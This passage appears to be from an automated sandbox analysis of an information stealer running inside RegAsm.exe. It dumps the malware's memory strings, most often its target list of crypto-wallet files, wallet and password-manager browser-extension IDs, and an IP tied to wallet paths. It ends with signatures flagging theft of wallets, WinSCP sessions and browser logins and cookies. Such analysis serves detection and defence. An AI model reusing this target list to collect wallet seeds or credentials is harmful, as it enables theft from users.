Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: MetaMask|1|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|MetaMask|1|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|1|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|TronLink|1|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|BinanceChainWallet|1|fhbohimaelbohpjbbldcngcnapndodjp|1|1|0|Yoroi|1|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase|1|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|1|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|1|iWallet|1|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|RoninWallet|1|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|1|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CloverWallet|1|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|LiqualityWallet|1|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra_Station|1|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|1|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|AuroWallet|1|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|PolymeshWallet|1|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|1|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98|1|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|1|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain|1|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|1|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|1|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Oxygen (Atomic)|1|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|PaliWallet|1|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|NamiWallet|1|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Solflare|1|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|CyanoWallet|1|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|1|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|1|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Goby|1|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|RoninWalletEdge|1|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|UniSat Wallet|1|ppbibelpcjmhbdihakflkdcoccbgbkpo|1|0|0|Authenticator|0|bhghoamapcdpbohphigoooaddinpkbai|1|1|0|GAuth Authenticator|0|ilgcnhelpchnceeipipijaljkblbcobl|1|1|1|Tronium|1|pnndplcbkakcplkjnolgbkdgjikjednm|1|0|0|Trust Wallet|1|egjidjbpglichdcondbcbdnbeeppgdph|1|0|0|Exodus Web3 Wallet|1|aholpfdialjgjfhomihkjbmgjidlcdno|1|0|0|Braavos|1|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|1|kkpllkodjeloidieedojogacfhpaihoh|1|0|0|OKX Web3 Wallet|1|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender|1|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|1|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|GeroWallet|1|bgpipimickeadkjlklgciifhnalhdjhe|1|0|0|Pontem Wallet|1|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Finnie|1|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra|1|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Microsoft AutoFill|0|fiedbfgcleddlbcmgdigjgdfcggjcion|1|0|0|Bitwarden|0|nngceckbapebfimnlniiiahkandclblb|1|0|0|KeePass Tusk|0|fmhmiaejopepamlcjkncpgpdjichnecm|1|0|0|KeePassXC-Browser|0|oboonakemofpalcgghocfoadofidjkkk|1|0|0|Rise - Aptos Wallet|1|hbbgbephgojikajhfbomhlmmollphcad|1|0|0|Rainbow Wallet|1|opfgelmcmbiajamepnmloijbpoleiama|1|0|0|Nightly|1|fiikommddbeccaoicoejoniammnalkfa|1|0|0|Ecto Wallet|1|bgjogpoidejdemgoochpnkmdjpocgkha|1|0|0|Coinhub|1|jgaaimajipbpdogpdglhaphldakikgef|1|0|0|Leap Cosmos Wallet|1|fcfcfllfndlomdhbehjjcoimbgofdncg|1|0|0|MultiversX DeFi Wal
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet3
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\info.seco
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 78.46.229.36s\AppData\Roaming\\Exodus\exodus.wallet\\seed.seco
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
                      Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
